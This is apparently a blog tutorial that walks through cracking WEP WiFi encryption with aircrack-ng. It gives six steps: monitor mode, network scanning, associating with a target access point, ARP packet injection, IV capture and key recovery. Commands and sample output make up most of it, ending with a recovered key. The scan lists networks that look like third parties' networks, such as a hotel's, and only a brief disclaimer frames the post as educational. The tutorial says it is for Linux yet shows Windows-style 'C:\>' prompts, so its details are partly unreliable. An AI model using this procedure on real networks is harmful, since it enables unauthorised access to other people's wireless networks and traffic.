WiFi WEP Encryption Cracking

Wired Equivalent Privacy (WEP) is a security algorithm for IEEE 802.11 wireless networks. Introduced as part of the original 802.11 standard ratified in 1997, its intention was to provide data confidentiality comparable to that of a traditional wired network.

In this post, I will teach you on how to crack WEP Encryption by utilizing aircrack-ng on your Linux System.

STEP START

STEP 1 → Run airmon-ng in monitor mode

 C:\>airmon-ng start eth1

STEP 2 → Start airodump-ng to display SSID on interface and keep it running

C:\>airodump-ng --ivs --write capture eth1
BBSID              PWR  RXQ  Beacons #Data #/s CH  MB   ENC  CIPHER  ESSID
02:24:2A:BC:89:FE  99   5    61      3     9   1   54e  OPN  WEP     GLOBBE_WIFI
02:24:2A:BC:89:DD  99   9    76      4     0   4   54e  OPN          SMMART_WIREL
00:12:6C:69:5D:CC  99   0    16      1     0   8   54e  WEP  WEP     SOGOOD_HOTEL
1E:33:4F:AE:69:7E  76   70   157     1     0   11  54e  WEP  WEP     HIDDEN_MEEKEY

BBSID              Station            PWR  Rate   Lost  Packets Probes
1E:33:4F:AE:69:7E  00:16:8A:B2:BD:B1  -1   1-0    0     1
1E:33:4F:AE:69:7E  00:1F:4C:CB:B6:BC  76   1e-54  0     6

STEP 3 → Associate your wireless card (eg. a6:69:ef:7d:d7:25) with the target access point

C:\>aireplay-ng -1 0 -e HIDDEN_MEEKEY -a  1e:33:4f:ae:69:7e -h a6:69:ef:7d:d7:25 eth1
22:25:10 Waiting for beacon frame (BSSID: 1E:33:4F:AE:69:7E) on channel 11

22:25:10 Sending Authentication Request
22:25:10 Authentication Successful
22:25:10 Sending Association Request
22:25:10 Association successful :-)

STEP 4 → Inject packets using aireplay-ng to generate traffic on the target access point

C:\>aireplay-ng -3 -b 1e:33:4f:ae:69:7e -h a6:69:ef:7d:d7:25 eth1
22:30:15 Waiting for beacon frame (BSSID: 1E:33:4F:AE:69:7E)

Saving ARP requests in replay_arp-0219-123051.cap
You should also start airodump-ng to capture replies
Read 11978 packets (got 7139 ARP requests), sent 3902 packets...

STEP 5 → Wait for airodump-ng to capture more than 50,000 IVs

STEP 6 → Crack Wired Equivalent Privacy Key using aircrack-ng

C:\>aircrack-ng -s capture.ivs
Opening capture.ivs

Aircrack-ng 0.7 r130
[00:00:10] Tested 77 keys (got 684002 IVs)

KB depth byte(vote)
0/0 1 AE(199) 29(27) 2D(13) 7C(12) FE(12) FF(6) 39(5) 2C(3) 00(0) 08(0)
10/ 3 66(41) F1(33) 4C(23) 00(19) 9F(19) C7(18) 64(9) 7A(9) 7B(9) F6(9)
20/ 2 5C(89) 52(60) E3(22) 10(20) F3(18) 8B(15) 8E(15) 14(13) D2(11) 47(10)
30/ 1 FD(375) 81(40) 1D(26) 99(26) D2(23) 33(20) 2C(19) 05(17) 0B(17) 35(17)

KEY FOUND! [AE:66:5C:FD:24]

STEP END

DISCLAIMER: Spydlawr does not promote, encourage, and support any sort of illegal activity. This statement is declaring that the content is for informational or educational purposes only.

Share this:

Related

Leave a comment Cancel reply